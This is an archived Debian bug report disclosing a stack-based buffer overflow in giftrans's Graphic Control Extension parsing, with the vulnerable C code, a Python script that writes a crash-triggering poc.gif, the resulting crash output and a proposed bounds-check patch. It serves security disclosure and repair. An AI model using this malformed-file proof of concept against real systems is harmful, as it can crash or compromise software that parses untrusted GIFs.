Bug#1002739: giftrans: Stack based buffer overflow in the giftrans function

To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: Bug#1002739: giftrans: Stack based buffer overflow in the giftrans function
From: Kolja Grassmann <koljagrassmann@mailbox.org>
Date: Tue, 28 Dec 2021 17:15:35 +0100 (CET)
Message-id: <[🔎] 1936331465.585860.1640708135943@office.mailbox.org>
Reply-to: Kolja Grassmann <koljagrassmann@mailbox.org>, 1002739@bugs.debian.org

Package: giftrans
Version: 1.12.2-19+b1
Severity: important
Tags: security

Dear Maintainer,

There is a stack based buffer overflow in the giftrans function of the giftrans application. The responsible source code looks as follows:

int giftrans(src,dest)
FILE    *src;
FILE    *dest;
{
        unsigned char   buffer[3*256],lsd[7],gct[3*256],gce[5];
[...]
        case 0xf9:      /* Graphic Control Extension */
                if (verbose)
                        (void)fprintf(stderr,"Graphic Control Extension:\n");
                (void)fread((void *)(buffer+2),1,1,src);
                size=buffer[2];
                (void)fread((void *)gce,size,1,src);

The problem here is, that the size value is read from the image file and then size bytes are written into a buffer of size 5. I wrote the following script to test this:

#!/bin/python3

# Writing to poc.gif
f = open("poc.gif", "wb")

sig = b"GIF87a"
w = b"\x10\x00"
h = b"\x10\x00"
flags_one = b"\x00"
bcolor = b"\x01"
aspect = b"\x01"

data = sig + w + h + flags_one + bcolor + aspect
f.write(data)

id = b"\x21"
val = b"\xf9"
size = b"\xff"
buffer_overflow = b"A"*255
data = id + val + size + buffer_overflow
f.write(data)

f.write(b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")

f.close()

The script generates a poc.gif file. Using this file on Debian 10 with the current version of giftrans does lead to a crash because a buffer overflow is detected:
$ giftrans -c test -o /dev/null poc.gif
*** buffer overflow detected ***: giftrans terminated
Abgebrochen

To address this issue I added a length check to the code locally:

case 0xf9:      /* Graphic Control Extension */
        if (verbose)
                (void)fprintf(stderr,"Graphic Control Extension:\n");
        (void)fread((void *)(buffer+2),1,1,src);
        size=buffer[2];
        if (size > 5) {
                return 1;
                }
        (void)fread((void *)gce,size,1,src);

Best regards
Kolja



-- System Information:
Debian Release: 10.11
  APT prefers oldstable-updates
  APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86_64)

Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages giftrans depends on:
ii  libc6       2.28-10
ii  x11-common  1:7.7+19

giftrans recommends no packages.

giftrans suggests no packages.

-- no debconf information

Reply to:

Prev by Date: Bug#1002202: pyocd: FTBFS: AttributeError: 'NoneType' object has no attribute 'split'
Next by Date: Bug#931113: marked as done (cflow: wierd Info node with emacs)
Previous by thread: python-kaptan_0.5.12-1_source.changes ACCEPTED into unstable
Next by thread: Bug#931113: marked as done (cflow: wierd Info node with emacs)
Index(es):
- Date
- Thread